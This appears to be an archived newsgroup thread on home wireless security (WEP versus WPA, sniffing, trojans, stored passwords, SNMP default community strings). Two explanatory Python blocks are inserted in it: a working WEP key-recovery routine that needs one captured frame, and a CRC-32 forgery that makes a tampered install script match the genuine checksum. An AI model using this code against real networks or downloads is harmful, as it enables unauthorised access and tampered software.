Can they hack into my computer?

Hello

I've had WEP encryption set up on my home network for more than a year. Only a few days ago I gave WPA a try, just out of curiosity and maybe to learn something. The reason I didn't do it before is that I don't think it's such a horrible thing if my neighbour uses my internet connection to do some web surfing and check mail, for instance.

Now, I read somewhere that the threat could be somebody gaining access to my computer and therefore doing all sorts of things with it. I don't know whether to believe this. Wouldn't an attacker still need my root/user password to get any further? I don't share files between computers; could somebody still do something through some open ports I have for some applications? Is there a reason to be worried, beyond the less important case of an occasional freeloader?

Regards

Jose Rodriguez

Bingo! You hit it. And if a NAT f/w prevents hosts "out there" from accessing such an IP/port, as with properly secured access, you've removed one threat dimension.

Your ISP may not be thrilled if you're providing a neighborhood hot-spot, either.

J

barry

Jose Rodriguez hath wroth:

Right. Now how would you know if your neighbor is using your system? How would you know that they're using it to surf the web, and not to hack into your system, or to spew spam? Got any monitoring in place?

Not really. All they want is enough information to pull off an identity theft. They don't need to hack into your machine to do that. Simply sniffing your traffic and extracting your unencrypted email is usually sufficient. The only thing that's stopping someone is your WEP encryption, which can be cracked in a few minutes. Note that they don't need to enter your network or dig through your computer, just sniff the traffic.

Mostly true. A determined hacker could enter your computer via the wireless and pull out some emailed bank statements, credit card payment statements, saved passwords, and whatever else looks interesting. At wireless speeds, they could copy most of the junk under My Documents and various email depositories fairly quickly, and inspect them at their leisure. Meanwhile, they could leave you with a virus, not because they're malevolent, but simply to distract you.

They would need some way to get past your NAT and firewall. That's not a trivial exercise. However, MS makes it easier by punching holes in the firewall with UPnP. Other applications add additional holes in the firewall until it looks like Swiss cheese. Remote control and tech support applications are a fair candidate for an external attack.

However, that's usually too sloppy and too much work. It's much easier to trick you into installing some remote control software on your machine, and then take control from the outside. Those are called Trojan Horse programs and are the basis of most of the "BotNet" systems that are spewing spam and precipitating DDOS attacks. If someone can get you to install or run one of these apps, using "social engineering", there's no need for them to try to get past your firewall.

Oh yes, but it would usually require a security vulnerability in some application that uses that open port to take advantage of it. There are plenty of such vulnerabilities out there, but they usually get patched and fixed fairly quickly. However, the trojan horse problem doesn't require a buggy application and will work quite nicely on a perfectly functional computah.

Yes. The real worry is someone sniffing your traffic and pulling off an identity theft. That's why you need and should use WPA or WPA2.

Jeff Liebermann

You're right, and another problem has been pointed out to me: what if somebody is using your connection for illegal purposes and you end up getting the blame for it? (Although it would be quite stupid to use the next-door connection to download child pornography, but who knows.)

I hadn't thought about that; it is worrying.

That's serious, but for that to work you have to leave things open and in the clear; I would only store passwords in an encrypted format and in a rather obscure location. And at least online banking is done over a secure connection, isn't it?

I guess that's one of the reasons why Linux is inherently more secure than Windows: software comes from digitally signed, official repositories, for instance. On the other hand, I still have to worry about things like remote registry, UPnP, remote assistance, server service, etc., since my partner runs Vista... it's so boring doing these things.

After this and some other posts in another list I believe I get the idea of the open ports thing. I just didn't get how it would be possible to get through something that was not intended to let you through.

Well, I'm convinced; I'll stick with my WPA2 thing, making sure the password is strong enough.

Thanks for the replies.

Jose Rodriguez

Jose Rodriguez hath wroth:

It's possible, but (to the best of my knowledge) it hasn't happened yet. There have been some arrests and stupid convictions for using a wireless connection without permission, but none for anything involving liability. The whole issue of responsibility for wireless security is currently unclear and I am NOT an expert or attorney. However, I suggest you do whatever it takes to not become a test case.

There are multiple levels of protection. The most obvious is to encrypt the wireless traffic so that nobody enters your LAN in the first place. That's the WPA and WPA2 encryption.

However, if someone can enter via wireless, what other defenses do you have? If you have shared folders, are they open to anyone to read or are they password protected? Do you have intrusion detection software running? Do you use encrypted folders (XP Pro only)? Are the documents themselves encrypted? Can they be copied, even if they are encrypted?

The last is fairly important. Most people assume that a document with simple encryption is safe. That really depends on the level of encryption and the time allowed. The encryption used may be relatively secure if I had a limited amount of time to recover the key. However, if I can copy the encrypted file to my own machine, I can do a brute force or better crack at my leisure. That would require a more secure system. I've also found that most users tend to use the same password for ALL their encrypted documents, so cracking one will usually crack them all. Note the number of "password recovery" programs and services available:

etc.

My personal solution is to NOT store anything of value on the machine. The really important stuff is on a removable USB thumb drive. It's also encrypted, password protected, and backed up with a copy somewhere. Not ideal, but with the whole neighborhood on my neighborhood wireless LAN, it's prudent.

Nope. There are distributions that come that way, but most of the stuff I run isn't. The stuff I've seen that is signed, is self authenticating and does not use an independent certificate authority. Therefore, it could be forged. Improbable, but possible.

The major difference between Linux and Windoze security is philosophy. Linux usually comes secure by default with all the security features enabled on installation. If you want to do something disgusting, then you have to do it intentionally. Windoze is built for user convenience and requires the user to implement and apply security. At least that's the way they started. Both extremes found that they had to compromise somewhat in order to make their products usable. Linux is becoming more permissive on installation and Windoze at least implements basic password security on installation. Since there's no "right answer", the issue will continue to be a moving target. Also, just because the vendor delivers a product that's more convenient than secure, doesn't mean you have to perpetuate the mistake.

Unfortunately, the wireless router industry has done the worst possible thing. Most wireless routers are wide open and totally insecure on installation. Open the box, plug it in, and in most cases, it will function. That's a great OBE (out of box experience) but doesn't make for a very secure system. Eventually, someone will sue a wireless router manufacturer for damages resulting from the false perception of security, and things might change. Meanwhile, only 2-wire has gotten the clue and delivers their routers secure by default. Again, just because the router manufacturers deliver insecure products, doesn't mean that you have to perpetuate the mistake.

Jeff Liebermann

I totally agree; when I said "I would" I meant exactly that, i.e. that I would do it that way if I had to. An online banking password stored on your computer is probably a way of asking for potential trouble. On the other hand, being realistic, I don't think that anybody would scan my hard drive and afterwards do a brute force attack on some suspiciously encrypted strings of text trying to find out whether there is anything interesting in them, unless they were pretty sure that they would find it, which is obviously not the case since I am not (and I don't look like) a very wealthy person. Applying the same reasoning, I don't hold (and I don't look like I do) any extra important and sensitive information somebody could make a profit out of. Let's face it, for the average Joe (like myself) some of the precautions available out there are overkill. The same, obviously, does not apply to the corporate world, and knowing how to protect your digital data is, in any case, highly recommended.

A similar issue arose in another list when somebody asked how reliable, in terms of security, SELinux can possibly be, given that it was first developed by the NSA. I agree with some of the opinions given there in that, at the end of the day, you will always have to rely on somebody unless you develop your own OS and your own software (and you don't connect to the internet unless you have your own ISP business, FWIW). I don't know what you run, but there is a qualitative difference between installing something that came from an official signed repository (yes, you have to rely on, say, the Debian developers) and running the latest supercool screensaver or useless utility (as many Windows users do, not to mention warez). Another point is the difference between open source and closed source. I'll give you an example: some time ago I downloaded and installed VMware and it all went fine, but I found the advertising mail they used to send me somewhat annoying. At some point I installed Samba to share files between my Linux and my virtual XP machine, with the consequence of receiving an e-mail immediately afterwards selling me the goodness of VMware products connected through Samba servers... I may be seeing ghosts here, I don't know.

Spot on, I guess, but how many users don't do anything at all about their systems? I myself, when on Windows, used to close down everything I could to avoid potential risks, as well as keeping a bare minimum set of security standards like setting up separate unprivileged accounts, firewall, antivirus, antispyware and so on, and yet I didn't bother to set up WPA till a couple of weeks ago out of pure laziness and ignorance.

One terrific example of a worst-case scenario I know of took place in Spain. Company X sells these nice wireless routers that come with their internet package. User Y believes he's safe because it came with encryption, and that sounds cool. What Y probably does not know is that the default SSID of every X router is something like "WLAN ZW", where ZW is, if I remember correctly, the last two digits of the router's MAC address, and the WEP key is a combination of the SSID and the whole MAC. Forget about injection, deauth, statistical attacks, whatever: one single data packet gathered gives you the key after an extremely quick dictionary search. I'd be quite angry if I were with company X.

Regards

Jose Rodriguez
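An added worked example (not part of the thread, and not Company X's actual key scheme, which the post does not spell out) of why "one single data packet" is enough to test a whole wordlist of WEP keys offline. WEP appends a CRC-32 integrity check value (ICV) to the plaintext before RC4-encrypting it with IV || key, so a guessed key is confirmed the moment the decrypted trailer's CRC matches; no second packet and no statistical attack is needed. Everything below is constructed: the MAC address, IV, payload and key are sample values, and `hypothetical_vendor_keyspace` is a made-up stand-in for a vendor's "key derived from the MAC" scheme, used only to show a small, enumerable candidate set.

```python
"""Test WEP key candidates against a single captured data frame.

WEP frame body layout (802.11-1999):
    IV (3 bytes) || key-id octet || RC4(IV || key) XOR (plaintext || ICV)
where ICV = CRC-32 of the plaintext, little-endian. A wrong key yields a
random trailer, so the ICV check fails with probability ~1 - 2**-32.
"""
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); WEP seeds it with IV || key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """Build the encrypted frame body (used here only to make sample traffic)."""
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    return iv + bytes([key_id << 6]) + rc4(iv + key, plaintext + icv)


def wep_decrypt(key: bytes, frame_body: bytes):
    """Return the plaintext if `key` passes the ICV check, else None."""
    iv, ciphertext = frame_body[:3], frame_body[4:]   # skip the key-id octet
    if len(ciphertext) < 4:
        return None
    plain = rc4(iv + key, ciphertext)
    payload, icv = plain[:-4], plain[-4:]
    if struct.unpack("<I", icv)[0] != (zlib.crc32(payload) & 0xFFFFFFFF):
        return None
    return payload


def wep_key_is_valid(key: bytes, frame_body: bytes) -> bool:
    return wep_decrypt(key, frame_body) is not None


def recover_key(frame_body: bytes, candidates):
    """Dictionary search: first candidate accepted by the ICV check, or None."""
    for key in candidates:
        if wep_key_is_valid(key, frame_body):
            return key
    return None


def hypothetical_vendor_keyspace(mac: bytes):
    """HYPOTHETICAL stand-in for a 'key derived from the MAC' default scheme:
    256 five-byte WEP-40 keys, the low 5 MAC bytes XOR a one-byte counter.
    Small keyspaces like this are what make the single-packet attack instant."""
    base = mac[1:]
    for counter in range(256):
        yield bytes(b ^ counter for b in base)


# --- constructed sample data (not captured from any real network) ---
SAMPLE_MAC = bytes.fromhex("001122334455")
SAMPLE_KEY = bytes(b ^ 0x5A for b in SAMPLE_MAC[1:])   # one of the 256 candidates
SAMPLE_IV = bytes.fromhex("a1b2c3")
# LLC/SNAP header for IP followed by a short unencrypted-looking payload
SAMPLE_PLAINTEXT = bytes.fromhex("aaaa030000000800") + b"GET / HTTP/1.0\r\n"
SAMPLE_FRAME = wep_encrypt(SAMPLE_KEY, SAMPLE_IV, SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    found = recover_key(SAMPLE_FRAME, hypothetical_vendor_keyspace(SAMPLE_MAC))
    print("recovered key:", found.hex() if found else None)
    print("decrypted    :", wep_decrypt(found, SAMPLE_FRAME) if found else None)
```

The same `recover_key` loop works with any candidate source: a wordlist, or the full 2^40 WEP-40 space if you have the patience. The point is that the CRC-32 ICV acts as a free key-correctness oracle in every data frame, which is one of several reasons the thread's advice to move to WPA/WPA2 stands.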

Jose Rodriguez hath wroth:

True. That takes too long. Just grab the Firefox or IE stored passwords. That's where all the goodies are usually buried. Got a bank account password saved in there?

I would be happy just to have a CRC on the distribution so that I know whether it has been modified. Many large distributions do that, but usually to determine if there's been download corruption, not as a security check.

It's probably true, but I'm too lazy to check the VMware privacy policy. My guess is that you have signed away some right for them to obtain a list of installed applications in order to improve their product quality. The road to hell is paved with the best of intentions.

Shhhhsh. Don't tell anyone. That kind of user supplies the bulk of my business. If they ever understood that they are personally responsible for security, and not Microsoft, I would be out of business. The company motto is "If this stuff worked, you wouldn't need me".

Not me. I download, install, tinker, and often break just about anything I find that's interesting. If it blows up, I restore with various tools (ERUNT, system restore, DVD backup, etc). I want to have things break on my machine before I inflict them on my customers. Also, it adds to my experience level, which gives me a few days lead time on the inevitable questions from customers.

The one exception is my office bookkeeping machine. It's almost totally isolated from the rest of the LAN and WAN. It does connect to the internet for updates, but only briefly. I have mirrored backups, encrypted filesystems, and secure access. If it goes, so does my business, so I'm very careful with it.

Lovely. Don't forget about "back door" passwords and multiple points of entry. For example, one very secure router forgot to change the SNMP passwords and left them at the defaults of public and private. Turn on SNMP, and the router is wide open. I can even change the admin password via SNMP. Fortunately, that's been fixed, but it took well over a year to convince them to do it.

Jeff Liebermann
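An added worked example (not from the thread) of the distinction Jeff draws above between a CRC that catches download corruption and a real security check. CRC-32 is linear, so whoever can alter a download can also append four chosen bytes that drag the checksum back to whatever value the mirror published; a detached signature or a strong hash published out-of-band does not have this property. The "package" bytes and the tampering below are constructed for illustration.

```python
"""Forge a CRC-32: make a tampered file match the checksum of the original.

CRC-32 (the zlib/Ethernet/PNG variant: reflected, poly 0xEDB88320,
init and final XOR 0xFFFFFFFF) is an affine function of its input, so any
target value can be reached by appending exactly 4 bytes.
"""
import hashlib
import struct
import zlib

POLY = 0xEDB88320
TABLE = []
for n in range(256):
    c = n
    for _ in range(8):
        c = (c >> 1) ^ POLY if c & 1 else c >> 1
    TABLE.append(c)
# The 256 table entries have 256 distinct top bytes, which is what lets us
# run the CRC register backwards one byte at a time.
TOP_BYTE_TO_INDEX = {entry >> 24: i for i, entry in enumerate(TABLE)}


def _register_after(data: bytes, reg: int = 0xFFFFFFFF) -> int:
    """CRC register state after feeding `data` (before the final XOR)."""
    for b in data:
        reg = TABLE[(reg ^ b) & 0xFF] ^ (reg >> 8)
    return reg


def crc32(data: bytes) -> int:
    return _register_after(data) ^ 0xFFFFFFFF


def forge_crc32_suffix(tampered: bytes, target_crc: int) -> bytes:
    """Return 4 bytes s such that crc32(tampered + s) == target_crc."""
    target_reg = target_crc ^ 0xFFFFFFFF
    start_reg = _register_after(tampered)
    # Walk backwards from the target: each step's table index is fixed by the
    # top byte of the register after that step.
    idx = [0] * 4
    reg = target_reg
    for i in range(3, -1, -1):
        idx[i] = TOP_BYTE_TO_INDEX[reg >> 24]
        reg = ((reg ^ TABLE[idx[i]]) << 8) & 0xFFFFFFFF   # upper 24 bits of the previous state
    # Walk forwards from register 0 to recover the 4 bytes that realise that index path.
    reg = 0
    from_zero = bytearray()
    for i in range(4):
        from_zero.append(idx[i] ^ (reg & 0xFF))
        reg = TABLE[idx[i]] ^ (reg >> 8)
    # Feeding bytes Y from register R equals feeding Y XOR LE(R) from register 0,
    # because the 4 state bytes are shifted out one per input byte.
    return bytes(y ^ r for y, r in zip(from_zero, struct.pack("<I", start_reg)))


def checksums(data: bytes) -> dict:
    """What a mirror might publish: CRC-32 (corruption check) vs SHA-256."""
    return {"crc32": crc32(data), "sha256": hashlib.sha256(data).hexdigest()}


# --- constructed sample: an 'official' install script and a tampered copy ---
GENUINE_PACKAGE = b"#!/bin/sh\necho 'installing supercool-screensaver 1.0'\ncp screensaver /usr/local/bin/\n"
TAMPERED_PACKAGE = GENUINE_PACKAGE + b"echo 'payload would run here'\n# "


def forged_package() -> bytes:
    """Tampered script plus 4 bytes (hidden after a comment marker) that restore the CRC."""
    return TAMPERED_PACKAGE + forge_crc32_suffix(TAMPERED_PACKAGE, crc32(GENUINE_PACKAGE))


if __name__ == "__main__":
    print("genuine :", checksums(GENUINE_PACKAGE))
    print("forged  :", checksums(forged_package()))
```

Run it and the two CRC-32 values agree while the SHA-256 digests differ: the CRC published next to a download protects against a flaky mirror, not against someone who replaced the file. That is exactly why a signed repository (or at least a published SHA-256, fetched over a channel the attacker does not control) is the meaningful check.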
